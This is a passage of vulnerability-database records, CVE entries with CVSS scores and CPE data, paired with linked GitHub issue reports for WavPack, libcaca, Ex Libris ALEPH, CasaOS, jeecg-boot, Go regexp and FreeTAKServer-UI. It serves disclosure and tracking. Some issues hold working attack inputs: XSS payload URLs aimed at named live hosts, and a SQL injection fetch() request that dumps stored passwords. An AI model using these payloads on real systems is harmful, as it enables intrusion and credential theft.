"af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/dbry/WavPack/issues/110" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2CZUFTX3J4Y4OSRITG4PXCI7NRVFDYVQ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/A5B7L26LA6KGX7YH6SWD5CSBNWKV5MBO/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRZWZKEEABCLVXZEXQZBIT3ZKLIXVFF5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I54NXQZELBF42OL4KQZJJRAYZX7IPZXP/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SQKOOJRI2VAPYS3652HVDXON723HTXBP/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wavpack:wavpack:5.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "3FA5388B-91D0-45C6-BEC9-4953666966D7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/dbry/WavPack/issues/110
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "dbry", "WavPack" ]
Hi, I have found a heap out of bounds read bug in function WavpackPackSamples, base on the commit a0ba858455b7c94f26c8f75511592323a70c3feb, code that caused crash shows below: source:src/pack_utils.c+632 ``` 628 if (wps->wphdr.flags & MONO_FLAG) { 629 switch (wpc->config.bytes_per_sample) { 630 case 1: 631 while (cnt--) { → 632 *dptr++ = (signed char) *sptr; 633 sptr += nch; 634 } 635 636 break; ``` Variable cnt is too large, that makes pointer sptr read beyond heap bound. Crash file: [crash.zip](https://github.com/dbry/WavPack/files/7589919/crash.zip)
A heap Out-of-bounds Read in WavpackPackSamples (src/pack_utils.c)
https://api.github.com/repos/dbry/WavPack/issues/110/comments
3
2021-11-23T17:17:36Z
2022-03-12T17:58:28Z
https://github.com/dbry/WavPack/issues/110
1,061,532,820
110
3,320
CVE-2022-0856
2022-03-10T17:44:57.487
libcaca is affected by a Divide By Zero issue via img2txt, which allows a remote malicious user to cause a Denial of Service
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cacalabs/libcaca/issues/65" }, { "source": "patrick@puiterwijk.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/B3E5GF2LSX2ZEY5JZNM7HXJMLHMY436X/" }, { "source": "patrick@puiterwijk.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GTDRPVX3HCYLQCLMQ6NNSRC3B7L6WGUM/" }, { "source": "patrick@puiterwijk.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MFOFTTMHO666HB3TVHBMCES6GCKG5PPG/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cacalabs/libcaca/issues/65" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/B3E5GF2LSX2ZEY5JZNM7HXJMLHMY436X/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GTDRPVX3HCYLQCLMQ6NNSRC3B7L6WGUM/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MFOFTTMHO666HB3TVHBMCES6GCKG5PPG/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libcaca_project:libcaca:0.99:beta20:*:*:*:*:*:*", "matchCriteriaId": "303D619F-28E8-474A-A435-FD95E0BC480F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "matchCriteriaId": "CC559B26-5DFC-4B7A-A27C-B77DE755DFF9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "369" ]
369
https://github.com/cacalabs/libcaca/issues/65
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cacalabs", "libcaca" ]
version: latest commit f42aa68fc798db63b7b2a789ae8cf5b90b57b752 driver: `src/img2txt` Environment: ubuntu 22.04, clang-12 step to reproduce: ``` export CFLAGS="-fsanitize=address -g" export CC=clang ./bootstrap ./configure make -j8 ./src/img2txt ./divide_by_0.seed ``` Sanitizer output: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==25214==ERROR: AddressSanitizer: FPE on unknown address 0x0000004d0433 (pc 0x0000004d0433 bp 0x7fff1cb39010 sp 0x7fff1cb38ee0 T0) #0 0x4d0433 in main /benchmarks/libcaca/src/img2txt.c:183:42 #1 0x7fa2270f9d8f (/lib/x86_64-linux-gnu/libc.so.6+0x2dd8f) #2 0x7fa2270f9e3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2de3f) #3 0x421944 in _start (/benchmarks/libcaca/src/img2txt+0x421944) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: FPE /benchmarks/libcaca/src/img2txt.c:183:42 in main ==25214==ABORTING ``` #POC [divide_by_0.zip](https://github.com/cacalabs/libcaca/files/8131265/divide_by_0.zip) ##Credit Han Zheng [NCNIPC of China](https://www.nipc.org.cn) [Hexhive](http://hexhive.epfl.ch/)
[BUG] Divide by zero in img2txt
https://api.github.com/repos/cacalabs/libcaca/issues/65/comments
3
2022-02-24T09:19:26Z
2022-08-03T09:44:11Z
https://github.com/cacalabs/libcaca/issues/65
1,149,044,044
65
3,321
CVE-2022-24177
2022-03-10T17:45:59.393
A cross-site scripting (XSS) vulnerability in the component cgi-bin/ej.cgi of Ex libris ALEPH 500 v18.1 and v20 allows attackers to execute arbitrary web scripts or HTML.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/zhao1231/cve_payload/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/zhao1231/cve_payload/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:exlibrisgroup:aleph_500:18.1:*:*:*:*:*:*:*", "matchCriteriaId": "E9E7FFE8-8723-4F9B-ABD4-0E7F2119DB49", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:exlibrisgroup:aleph_500:20.0:*:*:*:*:*:*:*", "matchCriteriaId": "A44DDF5A-C5C6-43DB-BD82-A37E578020BB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/zhao1231/cve_payload/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "zhao1231", "cve_payload" ]
**1** we can search Wuhan University Library on Google and click ![企业微信截图_16443782227933](https://user-images.githubusercontent.com/87362545/153117967-6afcec97-c7e4-4616-9779-759e33f08259.png) **2** then we click the E-journals of Resources ![image](https://user-images.githubusercontent.com/87362545/153118421-ab0f4602-44dc-4945-a46c-be64740e56fc.png) **3** we click the search,then we can jump to new page ![image](https://user-images.githubusercontent.com/87362545/153118686-ca90853d-53f0-4ed9-a141-444265c635aa.png) **4** enter payload in the search box : 12345" onmousemove="console.log(123) click the search box,then move the mouse over the search box,we can see log in the console ![image](https://user-images.githubusercontent.com/87362545/153129160-18e97b91-e7d5-4662-9bf1-24d8501c32f7.png) **5** there is the data package of burpsuite ![企业微信截图_1644385957881](https://user-images.githubusercontent.com/87362545/153130277-498d9bc9-da73-4bc0-9ff3-71dec5f9a0ed.png) GET /cgi-bin/ej.cgi?s=12345%22+onmousemove%3D%22console.log%28123%29&x=16&y=12&typ=0&lang=0 HTTP/1.1 Host: sfx.lib.whu.edu.cn User-Agent: R0VrgaJmaBRV Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Full URL of this vulnerability is : http://sfx.lib.whu.edu.cn/cgi-bin/ej.cgi?s=12345%22+onmousemove%3D%22console.log%28123%29&x=16&y=12&typ=0&lang=0
Ex libris_xss vulnerability
https://api.github.com/repos/zhao1231/cve_payload/issues/1/comments
0
2022-02-09T03:38:05Z
2022-02-09T05:54:33Z
https://github.com/zhao1231/cve_payload/issues/1
1,128,011,460
1
3,322
CVE-2022-24193
2022-03-10T17:45:59.733
CasaOS before v0.2.7 was discovered to contain a command injection vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/IceWhaleTech/CasaOS/commit/d060968b7ab08e7f8cbfe7ca9ccdfa47afe9bb06" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/IceWhaleTech/CasaOS/issues/84" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Mitigation", "Third Party Advisory" ], "url": "https://www.star123.top/2022/01/08/A-vulnerability-in-CasaOS/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.star123.top/2022/01/08/A-vulnerability-in-CasaOS/#more" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/IceWhaleTech/CasaOS/commit/d060968b7ab08e7f8cbfe7ca9ccdfa47afe9bb06" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/IceWhaleTech/CasaOS/issues/84" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Mitigation", "Third Party Advisory" ], "url": "https://www.star123.top/2022/01/08/A-vulnerability-in-CasaOS/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.star123.top/2022/01/08/A-vulnerability-in-CasaOS/#more" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:*", "matchCriteriaId": "DBF947F7-0A3B-4B3B-BA2A-F60AC8FC8F5C", "versionEndExcluding": "0.2.7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/IceWhaleTech/CasaOS/issues/84
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "IceWhaleTech", "CasaOS" ]
**Describe the bug** Here is a security vulnerability will lead to controller the system. **Detail** https://www.star123.top/2022/01/08/A-vulnerability-in-CasaOS/#more and the password is sent to Guan.Ningchuan@gmail.com.
A security vulnerability which will lead to controller the system
https://api.github.com/repos/IceWhaleTech/CasaOS/issues/84/comments
4
2022-01-26T07:30:28Z
2022-01-28T09:12:31Z
https://github.com/IceWhaleTech/CasaOS/issues/84
1,114,710,756
84
3,323
CVE-2021-44585
2022-03-10T21:15:14.397
A Cross Site Scripting (XSS) vulnerabilitiy exits in jeecg-boot 3.0 in /jeecg-boot/jmreport/view with a mouseover event.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/3223" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/3223" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecg_boot:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "45720048-60C0-4FA8-AA09-16C8CF329FD3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/jeecgboot/jeecg-boot/issues/3223
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
##### 版本号: 3.0 ##### 问题描述: http://boot.jeecg.com:8080/jeecg-boot/jmreport/view/')%22onmouseover=alert('hacking')%20%20( ##### 截图&代码: ![image](https://user-images.githubusercontent.com/63626545/144021468-eedd94b9-694a-435d-8588-a747f3410ab2.png)
反射型XSS漏洞
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/3223/comments
4
2021-11-30T09:33:40Z
2022-03-14T01:15:49Z
https://github.com/jeecgboot/JeecgBoot/issues/3223
1,067,002,316
3,223
3,324
CVE-2022-24726
2022-03-10T21:15:14.603
Istio is an open platform to connect, manage, and secure microservices. In affected versions the Istio control plane, istiod, is vulnerable to a request processing error, allowing a malicious attacker that sends a specially crafted message which results in the control plane crashing when the validating webhook for a cluster is exposed publicly. This endpoint is served over TLS port 15017, but does not require any authentication from the attacker. For simple installations, Istiod is typically only reachable from within the cluster, limiting the blast radius. However, for some deployments, especially [external istiod](https://istio.io/latest/docs/setup/install/external-controlplane/) topologies, this port is exposed over the public internet. This issue has been patched in versions 1.13.2, 1.12.5 and 1.11.8. Users are advised to upgrade. Users unable to upgrade should disable access to a validating webhook that is exposed to the public internet or restrict the set of IP addresses that can query it to a set of known, trusted entities.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/golang/go/issues/51112" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/istio/istio/commit/6ca5055a4db6695ef5504eabdfde3799f2ea91fd" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/istio/istio/security/advisories/GHSA-8w5h-qr4r-2h6g" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/golang/go/issues/51112" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/istio/istio/commit/6ca5055a4db6695ef5504eabdfde3799f2ea91fd" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/istio/istio/security/advisories/GHSA-8w5h-qr4r-2h6g" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:istio:istio:*:*:*:*:*:*:*:*", "matchCriteriaId": "E255ACB0-90AB-4FC4-AC4B-D7DE613A115E", "versionEndExcluding": "1.11.8", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:istio:istio:*:*:*:*:*:*:*:*", "matchCriteriaId": "93FFCE9E-9ECF-4B07-B18B-1B73C313CE2C", "versionEndExcluding": "1.12.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.12.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:istio:istio:*:*:*:*:*:*:*:*", "matchCriteriaId": "3C6F7ADF-2FD8-4986-A6F2-0000CC5770D4", "versionEndExcluding": "1.13.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.13.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "400" ]
400
https://github.com/golang/go/issues/51112
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "golang", "go" ]
On 64-bit system, a large enough regexp can be deeply nested enough to cause goroutine stack overflows (the kind where the runtime says no more stack for you and exits). Specifically, strings.Repeat("(", 1<<20)+strings.Repeat(")", 1<<20) is enough. I ran a test inside Google using C++ RE2 limiting the nesting depth of accepted expressions. A max depth of 200 did not break any of our tests. (A max depth of 100 did break one library that was mechanically generating a truly awful regular expression.) To fix the problem I intend to cap the maximum depth of a regexp accepted by syntax.Parse at 1000, >5X what is needed by Google C++ and really about 100X what is reasonable. Depth means the depth of the parse tree: `(((((a)))))` has depth 5, as does `a*****` in POSIX mode. (In Perl mode that's a syntax error.) This will need to be backported to Go 1.16 and Go 1.17 as well.
regexp: stack overflow (process exit) handling deeply nested regexp
https://api.github.com/repos/golang/go/issues/51112/comments
9
2022-02-09T20:13:46Z
2023-06-22T21:55:10Z
https://github.com/golang/go/issues/51112
1,128,977,907
51,112
3,325
CVE-2022-25506
2022-03-11T00:15:08.253
FreeTAKServer-UI v1.9.8 was discovered to contain a SQL injection vulnerability via the API endpoint /AuthenticateUser.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FreeTAKTeam/UI/issues/27" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FreeTAKTeam/UI/issues/27" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:freetakserver-ui_project:freetakserver-ui:1.9.8:*:*:*:*:*:*:*", "matchCriteriaId": "A13C85E9-A6CF-4B38-8E0E-BB54C8AFD3A8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/FreeTAKTeam/UI/issues/27
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FreeTAKTeam", "UI" ]
The API endpoint `/AuthenticateUser` contains a SQL Injection into the SQLite3 Database that is handling the authentication process of the SystemUsers. In order to exploit this vulnerability the attacker need to possess a valid API key, which can either be leaked through the XSS from an End User Device, or given as a part of the UAV Operator ability which broadcasts the GPS and Video feed of a UAV-Drone. From the SQL Injection it is possible to list all the Username, UsedID and Clear-Text passwords in the database. ##### Proof of Concept Posting the follwing snippet into a web browsers console will trigger the SQL Injection and return the name and password for each user in the SystemUsers table. ``` fetch("http://atak.FreeTAKServer.com:19023/AuthenticateUser?username=abc\" UNION SELECT (SELECT group_concat(name||':'||password) FROM SystemUser),'b','c','PASSWORD','d','e'--&password=PASSWORD", { "headers": { "accept": "*/*", "accept-language": "en-US,en;q=0.9", "authorization": "Bearer ValidAPIKey", "content-type": "application/json" }, "mode": "cors" }); ``` Will return the following response: ![sqli_response](https://user-images.githubusercontent.com/14073684/154236898-a613d20a-92e3-4ab2-88de-95f5f40c18d0.jpg) Which clearly shows the database results in clear-text.
SQL Injection on AuthenticateUser
https://api.github.com/repos/FreeTAKTeam/UI/issues/27/comments
0
2022-02-16T09:38:15Z
2024-05-15T23:13:25Z
https://github.com/FreeTAKTeam/UI/issues/27
1,139,772,026
27
3,326
CVE-2022-25507
2022-03-11T00:15:08.307
FreeTAKServer-UI v1.9.8 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Callsign parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": 